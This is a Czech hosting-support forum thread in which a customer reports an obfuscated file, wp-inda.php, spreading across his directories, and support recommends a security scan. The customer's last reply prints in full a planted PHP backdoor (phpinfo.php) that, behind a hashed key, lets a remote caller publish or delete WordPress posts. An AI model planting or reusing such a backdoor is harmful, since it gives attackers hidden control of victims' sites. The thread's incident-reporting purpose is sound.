soubor wp-inda.php

Vyřešeno640 zhlédnutíWebhosting
0

Dobrý den,
ve všech adresářích na specialne.cz se začal objevovat soubor wp-inda.php

Obfuscation provided by Unknowndevice64 – Free Online PHP Obfuscator
http://www.ud64.com/

Tak se chci optat, zda je to v pořádku? Tento soubor jsem určitě nenahrával. Děkuji za informaci, přeji hezký den. Radek

Role: Zákazník
Otázka je uzamčena pro nové odpovědi.
MB313456 Vybral nejlepší odpověď 1. 9. 2022
0
46.23K Odpověď od WEDOS Internet, a.s. 0 Comments

Dobrý den,

případně tedy zvolte jiný bezpečnostní plugin podle svého CMS. Nebo proveďte antivirový sken souborů ve svém PC.

Případně také můžete kontaktovat někoho, kdo se zabývá odvirováním webů, tím se my nezabýváme a tak nemůžeme dát zaručený tip.

Role: Podpora Web: https://wedos.cz Vizitka: Produktový manažer.
MB313456 Vybral nejlepší odpověď 1. 9. 2022
0
46.23K Odpověď od WEDOS Internet, a.s. 0 Comments

Dobrý den,

pokud používáte WordPress, raději si nainstalujte nějaký bezpečnostní plugin a proveďte sken webu. Třeba Wordfence.

Role: Podpora Web: https://wedos.cz Vizitka: Produktový manažer.
RM130195 Odpověděl na otázku 15. 8. 2022
0

Dobrý den,
určitě na webhostingu nepoužívám WordPress, navíc se soubor nacházel na všech subdomenách a v každém adresaři, provedl jsem vymaz nepotřebných subdomen a prošel jsem všechny složky a smazal jsem tedy wp-inda.php, narazil jsem i na podivný soubor phpinfo.php, tak vám projistotu posílám obsah:

„phpinfo.php“
<?php
if(md5(@$_GET[„api_key“]) != ‚f2745b0fbeb79404967de8381fefb0a0‘)
{
exit();
}
include „wp-load.php“;

if(@$_POST[„proc“] == „new_post“)
{
$categories = get_categories();
$category_id = $categories[1]->term_id;
$postdate = ‚2010-02-23 18:57:33‘;
$my_post = array(
‚post_title‘ => wp_strip_all_tags(base64_decode(@$_POST[‚post_title‘])),
‚post_content‘ => stripslashes(@$_POST[‚post_content‘]),
‚post_status‘ => ‚publish‘,
‚post_author‘ => 1,
‚post_date‘ => $postdate,
‚post_category‘ => array($category_id)
);
$post_id = wp_insert_post($my_post);
if($post_id)
{
echo $post_id;
}
}elseif(@$_POST[„proc“] == „delete_post“){

if(wp_delete_post($_POST[„post_id“], true))
{
echo ‚success‘;
}
}elseif(@$_POST[„proc“] == „check“)
{
echo ‚success‘;
}
„konec souboru phpinfo.php“

Budu tedy sledovat, zda se tyto aktivity budou znovu opakovat a když tak bych se ozval, děkuji za info a přeji hezký den Radek

Role: Zákazník
RM130195 Změnil status na publikováno 16. 8. 2022